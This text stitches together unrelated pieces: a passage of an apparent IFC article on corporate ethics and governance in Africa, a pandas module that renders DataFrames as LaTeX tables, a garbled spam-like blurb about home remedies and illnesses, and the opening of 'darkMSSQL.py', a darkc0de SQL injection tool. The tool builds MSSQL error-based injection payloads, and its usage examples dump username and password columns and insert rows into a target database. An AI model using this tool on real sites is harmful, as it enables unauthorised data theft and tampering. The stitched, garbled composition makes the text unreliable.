But I would argue that it’s not just an issue for South African companies. In Kenya, for example, IFC is advising the Capital Market Authority on implementing a new corporate governance code. The code places great emphasis on transparency and disclosure, with a particular focus on stakeholder relations, ethics and corporate responsibility.
Globally, there’s a strong push for more detailed reporting on non-financial aspects of company operations, led by investors and shareholders. The reason? An increased level of disclosure, going beyond the balance sheet to span all aspects of operations, makes it harder to cover up ethics breaches, poor corporate citizenship, or otherwise bad corporate behaviour. Best-in-class disclosure gives investors comfort. It can mitigate some of the risks inherent in emerging and frontier markets, where there could be weak institutional oversight.
For companies in emerging markets, this better disclosure – including detail on safeguards to reduce the risk of ethics troubles – can be a differentiator as they compete for foreign investment. In addition, some studies have shown that increased disclosure and more detailed reporting can help lower companies’ cost of capital.
At IFC, our own commitment to heightened transparency and disclosure is embedded in our access to information policy. For our clients, we are responding to the growing global emphasis on transparency and disclosure with new tools that help companies enhance their non-financial reporting. We are also are expanding the scope of our corporate governance advice, which falls within a comprehensive environmental, social and governance framework to address the broader range of ethical issues companies face in today’s complex world. It’s all part of our overarching mission to encourage investment in emerging markets, guided by performance standards that aim for a strong triple bottom line: solutions that are good for business, investors and the local community and environment.
Unfortunately, though, there will always be bad actors. There will always be those in corporate positions of power with criminal intent in mind. There will always be the potential for ethical lapses – even if they are inadvertent or unintended.
That’s not to say that nothing can be done. Companies can take strong and decisive action to reduce these risks. They can demonstrate proactive efforts to safeguard their corporate integrity. In doing so, they will be better positioned to attract investment and thrive over the long term. Here are four steps African companies can take right now to ensure that their ethical houses are in order.
The arbiters of a company’s ethical behaviour are its wide range of stakeholders. These include employees, who may not have a say in how the company is run. However, even a perception of impropriety – and the ensuing damage to the company’s reputation – could have a profound impact on them and their families. Customers, too, play an important role. They can validate the company’s integrity by purchasing its products and services. In the event of inappropriate company behaviour, they can show their dissatisfaction by buying the competitor’s goods instead, with potentially disastrous revenue implications for the company.
The community at large also has a vested interest in the company, which has the potential to drive broader economic growth in the region. The community has power as well, bringing to bear a collective voice that is louder and stronger than ever, thanks to social media. Companies that behave badly – say by sending untreated manufacturing waste into local waterways or by making false claims about its products – won’t go unnoticed for very long.
Much of the responsibility for ethical corporate behaviour lies with the company’s board of directors. The converse is true as well: a weak board is an open invitation for bad actors to perpetrate fraud or other criminal activity. In short, the board is the custodian of the company’s reputation – for better or for worse.
For this reason, a strong board, comprised of a gender-diverse mix of directors, who bring complementary skills and experience to the table, is a must. Independent directors with standing in the community or in their field are an important part of the mix. They bring objectivity and an outsider’s point of view along with their good reputations, which can only benefit the board’s discussions and decision-making.
The conversation in African boardrooms today should be about putting into place robust safeguards to reduce the risk of ethical breaches. It starts with a clear statement from the board, indicating that the company has zero tolerance for fraud. The statement should include a plan for the what-if: what if evidence of fraud comes to light? It should stipulate the importance of the board’s role in stepping up, pushing for an investigation and announcing the results.
After defining the systems and processes that would guide an investigation, the company can test out the approach through frequent simulations. This will ensure that the anti-fraud mechanisms that were put in place remain relevant and effective. Such exercises demonstrate vigilance, putting potential fraudsters on notice that they will not be able to get away with their actions.
Conflicts of interest are bound to happen. The reality in many of Africa’s smaller markets – where there may be a limited number of suppliers and an even more limited number of players – is that it is next to impossible to avoid such conflicts. It could be a related party transaction, for example in a situation in which a board director has a connection with a potential supplier. This can result in unfair market practices, such as preferential pricing or too favourable a deal in exchange for a non-compete contract.
If such conflicts can be avoided, they should be. But, in accepting the reality on the ground, the key is to establish a clear policy that defines how the company handles such conflicts when they arise. The policy should state that anyone who has a conflict of interest should disclose the conflict. They should step away from the situation at hand and recuse themselves from the discussion and the decision. Of course, it’s not enough to have a policy on paper. It needs to be enforced. And, it needs to reported, rather than pretending it never happened.
Taking such actions now will position African companies well for the future. They will be better prepared to respond appropriately. And they will show that they have done all they can to reduce their business, ethics, governance and reputational risks, as the call for enhanced transparency and disclosure grows louder. |
"""
Module for formatting output data in Latex.
"""
from abc import ABC, abstractmethod
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: Optional[Union[str, Tuple[str, str]]]
) -> Tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: List[List[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> List[List[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> List[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: List[str]) -> List[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: List[str], i: int) -> List[str]:
r"""
Check following rows, whether row should be a multirow
e.g.: becomes:
a & 0 & \multirow{2}{*}{a} & 0 &
& 1 & & 1 &
b & 0 & \cline{1-2}
b & 0 &
"""
for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
def __init__(
self,
formatter: DataFrameFormatter,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[str] = None,
short_caption: Optional[str] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> Type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[Union[str, Tuple[str, str]]] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> Type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> Optional[str]:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: Optional[str]) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
Right alignment for numbers and left - for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
def _escape_symbols(row: Sequence[str]) -> List[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
List of string, that may contain special symbols.
Returns
-------
list
list of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> List[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
if __name__ == "__main__":
import doctest
doctest.testmod()
|
1001 Home Health Remedies 2008 Reader 39 S Digest Association Pdf - Classification. Classically, "lead poisoning" or "lead intoxication" has been defined as exposure to high levels of lead typically associated with severe health effects. Poisoning is a pattern of symptoms that occur with toxic effects from mid to high levels of exposure; toxicity is a wider spectrum of effects, including subclinical ones (those that do not cause symptoms).. Other. Neonatal herpes simplex is a HSV infection in an infant. It is a rare but serious condition, usually caused by vertical transmission of HSV-1 or -2) from mother to newborn. During immunodeficiency, herpes simplex can cause unusual lesions in the skin.. Answers.com is the place to go to get the answers you need and to ask the questions you want.
Both a contract drafter and a contract reviewer can save some time by first reviewing — together — the Common Draft short-form contract drafts (as well as other clause titles) and discussing just what types of provision they want in their document.. After Rockefeller’s unceremonious ejection, the yacht was then buzzed by Blackhawk helicopters before French fighter jets gave a warning pass overhead, whereupon the helicopters retreated.. Ginger: An Ancient Panacea for Modern Times ( By Brenda Castro) INTRODUCTION. Known as vishwabheshaja, “the universal medicine”, ginger (zingiber officinale) has been a panacea for digestive, respiratory, and circulatory disorders for thousands of years.1,2 Ginger’s versatility is found in ancient Ayurvedic texts, international cuisine, and a broad spectrum of home remedies..
How the beta glucan fiber in brewer’s, baker’s, and nutritional yeast can improve wound healing and, potentially, anti-cancer immunity. Below is an approximation of this video’s audio content. To see any graphs, charts, graphics, images, and quotes to which Dr. Greger may be referring, watch. |
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Share the c0de!
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, rechemen, c0mrade (r.i.p brotha), reverenddigitalx
# and the darkc0de crew
# Thanks to inkubus for helping me beta
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage caused! User assumes all responsibility
# Intended for authorized Web Application Pen Testing Only!
# BE WARNED, THIS TOOL IS VERY LOUD..
import sys, re, os, socket, urllib2, time, random, cookielib, string
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --info Gets MySQL server configuration only."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --insert Insert data into specified db, table and column(s)."
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.asp?id=2\" or \"www.site.com/index.asp?id=news'\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is darkMSSQLlog.txt"
print "\tDefine: -r \"-r 20\" this will make the script resume at row 20 during dumping"
print "\tDefine: --cookie \"cookie_file.txt\""
print "\tDefine: --debug Prints debug info to terminal."
print "\n Ex: ./darkMSSQL.py --info -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --dbs -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --schema -u \"www.site.com/news.asp?id=2\" -D dbname"
print " Ex: ./darkMSSQL.py --dump -u \"www.site.com/news.asp?id=2\" -D dbname -T tablename -C username,password"
print " Ex: ./darkMSSQL.py -u \"www.site.com/news.asp?news=article'\" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass"
print
sys.exit(1)
#define varablies
site = ""
dbt = "darkMSSQLlog.txt"
proxy = "None"
count = 0
basicinfo = ["@@VERSION","USER","DB_NAME()","HOST_NAME()",]#@@SERVERNAME] *SEVERNAME causes errors on some 2000 servers
db_num = 0
top_num = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_insert = "None"
arg_debug = "off"
arg_cookie = "None"
col_url = ""
insert_url = ""
selected_col = ""
inserted_data = ""
mode = "None"
gets = 0
row_num = 0
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--debug":
arg_debug = "on"
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--insert":
mode = arg
arg_insert = sys.argv[count+1]
elif arg == "-r":
row_num = sys.argv[count+1]
top_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|"
file.write("\n|------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v2.0 |")
file.write("\n| 10/2008 darkMSSQL.py |")
file.write("\n| -MSSQL Error Based Database Enumeration |")
file.write("\n| -MSSQL Server Information Enumeration |")
file.write("\n| -MSSQL Data Extractor |")
file.write("\n| Usage: darkMSSQL.py [options] |")
file.write("\n| [Public Beta] -h help darkc0de.com |")
file.write("\n|------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --info, --dbs, --schema, --dump, --insert"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "\n[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "\n[-] You must include -D, -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if site[:4] != "http":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if arg_columns != "None":
arg_columns = arg_columns.split(",")
for column in arg_columns:
col_url += "%2bconvert(varchar,isnull(convert(varchar,"+column+"),char(32)))%2bchar(58)"
if arg_insert != "None":
arg_insert = arg_insert.split(",")
#General Info
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site)
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Cookie:", arg_cookie
file.write("\n[+] Cookie: "+arg_cookie)
#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
